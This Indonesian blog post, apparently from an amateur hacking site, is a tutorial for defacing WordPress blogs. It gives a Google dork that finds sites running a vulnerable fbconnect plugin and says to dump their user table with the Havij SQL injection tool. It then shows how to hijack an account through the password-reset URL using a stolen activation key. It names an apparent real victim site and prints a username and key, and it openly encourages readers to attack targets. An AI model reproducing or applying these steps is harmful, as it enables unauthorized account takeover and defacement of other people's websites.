(by InfohackComputer & DaffaComputer)
Hack WordPress (SQL Injection + Reset Password) merupakan salah satu cara yang dapat kita gunakan untuk mendeface Blog WordPress. Caranya disini tidak terlalu panjang. Bahan-bahan yang dibutuhkan demi lancarnya aksi kita adalah sbb:
1. Kompie terhubung internet
2. Havij (maklum lammer jadi masih pake tool, yang dewa manual aja yah)
3. dork: inurl:?fbconnect_action=myhome ( kreasi lagi yaa )
4. Kesabaran dalam mencari target
5. Kopi dan musik yang kuenceng ( disarankan alirannya Rock,Metal ) hehehe
dari sumbernya diberikan contoh satu korban yaitu http://www.40sale.com/?fbconnect_action=myhome&userid=14
pada bagian “userid=” di tambahin tulisan ” fb” jadi bentuknya menjadi http://www.40sale.com/?fbconnect_action=myhome&fbuserid=14
Kalau sudah discan dengan Havij,, cari Tabel Wp_User atau yang berhubungan dengan User -lah, kalau sudah ketemu cari Column User_Login dan User_Activation_Key.
pada contoh ini yg diketemukan adalah:
Username: Pico
Activation Key: GBasuGIZFtbUjpP3MvWb
Sekarang kita gunakan exploitnya yaitu “Activation Key”
Jadi alamatnya dirubah menjadi seperti ini http://www.40sale.com/wp-login.php?action=rp&key=GBasuGIZFtbUjpP3MvWb&login=pico
Sampailah kita ke tahap me-Reset Password korban, kalau udah direset kita tinggal Login dan melakukan apa yg kita mau. Pada contoh saya,, cukup mengedit Home.Php nya saja..
ok .. silahkan teruskan dan selamat berjuang..
Tidak ada komentar:
Posting Komentar